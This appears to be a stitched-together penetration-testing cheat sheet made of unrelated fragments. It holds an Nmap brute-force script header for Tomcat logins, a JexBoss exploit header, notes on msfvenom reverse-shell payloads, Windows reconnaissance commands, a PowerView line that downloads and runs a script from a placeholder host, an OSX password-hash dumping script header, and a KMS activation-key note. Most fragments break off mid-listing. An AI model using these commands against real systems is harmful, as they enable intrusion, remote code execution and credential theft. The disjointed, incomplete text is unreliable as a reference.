### To laptop
Specify an IP address to eth0 (here 192.168.56.1)
sudo ifconfig eth0 192.168.56.1 netmask 255.255.255.0
local shortport = require "shortport"
local http = require "http"
local stdnse = require "stdnse"
local brute = require "brute"
local creds = require "creds"
description = [[
Performs a dictionary/brute-force attack over the login and password fields of the Apache Tomcat default web management pages.
]]
#coding: utf-8
'''
--------------------------------------------------------------------------------------
# [+] JexBoss v1.0. @author: João Filho Matos Figueiredo (joaomatosf@gmail.com)
# [+] Updates: https://github.com/joaomatosf/jexboss
# [+] Original SCRIPT: http://1337day.com/exploit/23507
# [+] Free for distribution and modification, but the authorship should be preserved.
--------------------------------------------------------------------------------------
[+] SCRIPT Edited by: [ I N U R L - B R A S I L ] - [ By GoogleINURL ]
Abstract
This document explains how to locate WaitForSingleObject(..., INFINITE)
within a payload generated by msfvenom (4.12.23-dev) and how to fix the payload's glitches. It walks through the analysis of a windows/shell_reverse_tcp payload, touching on issues like stack alignment and the locating and patching of WaitForSingleObject. It was written when I realised there are many topics on the Offensive-Security OSCE/CTP forums touching on the problem of finding this particular Windows API. Since RE is one of my stronger FU's, I decided to write down my explanation of the subject.
Contents:
Windows.10.and.Office.2016.gVLK
#####################################################################
# Install/Uninstall keys #
#####################################################################
1.) Uninstall the current product by entering the “uninstall product key” extension:
slmgr.vbs /upk
2.) Install the key that you obtained above for “Windows Srv 2012R2 DataCtr/Std KMS for Windows 10”
Open PowerShell (right click > run as Administrator), and enter
Get-AppxPackage *photo* | Remove-AppxPackage
For other apps just replace "photo" with something else.
If you want to look at the list of installed applications, just use Get-AppxPackage; if you want to copy that list into a program better suited for working with text (e.g. one with search), just type Get-AppxPackage | clip
Windows version (the key path contains spaces, so it must be quoted; /reg:64 queries the 64-bit registry view):
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /reg:64
Users who have authenticated to the system (each has a profile directory):
ls C:\Users\
System environment variables:
reg query "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Environment" /reg:64
Saved outbound RDP connections:
# Import PowerView into memory without touching disk
# IEX (New-Object Net.WebClient).DownloadString('http://HOST/powerview.ps1')
###################################
# Hunting for Users
###################################
# search for administrator groups
#!/usr/bin/python
# extracts OSX user hashes and outputs a format crackable with oclHashcat
# adapted from http://apple.stackexchange.com/questions/186893/os-x-10-9-where-are-password-hashes-stored
# and https://web.archive.org/web/20140703020831/http://www.michaelfairley.co/blog/2014/05/18/how-to-extract-os-x-mavericks-password-hash-for-cracking-with-hashcat/
#
# automation of approach by @harmj0y
#
# sudo ./osx_hashdump.py
# ./oclHashcat64.bin -m 7100 hash.txt wordlist.txt